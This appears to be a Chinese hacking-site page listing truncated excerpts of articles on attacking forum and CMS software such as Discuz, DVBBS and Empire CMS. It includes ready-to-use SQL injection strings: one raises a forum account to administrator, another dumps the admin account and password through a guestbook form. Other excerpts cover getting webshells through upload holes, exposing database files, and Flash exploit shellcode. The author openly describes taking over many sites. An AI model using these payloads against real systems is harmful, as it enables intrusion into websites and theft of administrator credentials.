转自: www.link0day.cn鸡肋的上传漏洞 不过对后台拿shell做了点贡献~ upinc.asp： <!--#include file="chkuser.asp"--><%Server.ScriptTimeOut=5000%><style type="text/css">*{ padding:0px; margin:0px; font-size:...

插件版本：2.2  2.5注册一个论坛IDIE提交下面代码blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/提升到管理员discuz7.0.0后台得webshell方法/Article/200...

注意:文章已经发表在2008第7期《黑客防线》上,转载请注明出处。（最近拿站比较多，没来得及写日志，拿这篇文章凑数！） 几 个月前，DVBBS php2.0暴了一个可以直接读出管理员密码的sql注入漏洞，当时这个漏洞出来的时候，我看的心痒，怎么还会有这么弱智的漏洞，DVBBS php2.0这套代码我还没仔细看过，于是5月中旬我down下来粗略看了下，接着我花了三天的时间，拿下p.dvbbs.ne...

dispuser.php文件 $UserName = trim($name);                    //这句开始出问题if( is_numeric($id) ){  $showUs...

只要知道目录名称就可以选择"文件管理"点下面的"开始搜索"在下面"需要清理的上传目录"处写入目录如 "../admin" "../data"点"清除位记录文件"可以暴出data下的数据库文件 admin目录下的文件 ...

找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1出来的是帝国CMS的留言本,在姓名处写:縗\联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) fromphome_enewsuser where userid=1),1,1,1,0,0,0)/*提交后爆出账号密码...

最近几天flash漏洞的网马非常流行，于是我想分析一下shellcode是怎么跑的。 但是能力所限，还难以像大牛们一样定位到有漏洞的代码及观察整个溢出过程。于是，我只能做后面一部分工作，即看看那个畸形flash文件中的shellcode长得什么样子，它运行起来会有什么动作。 我使用的是从网站抓下来的win 9,0,115,0ie.swf。很容易地就在畸形.swf文件中找到了shellcode的...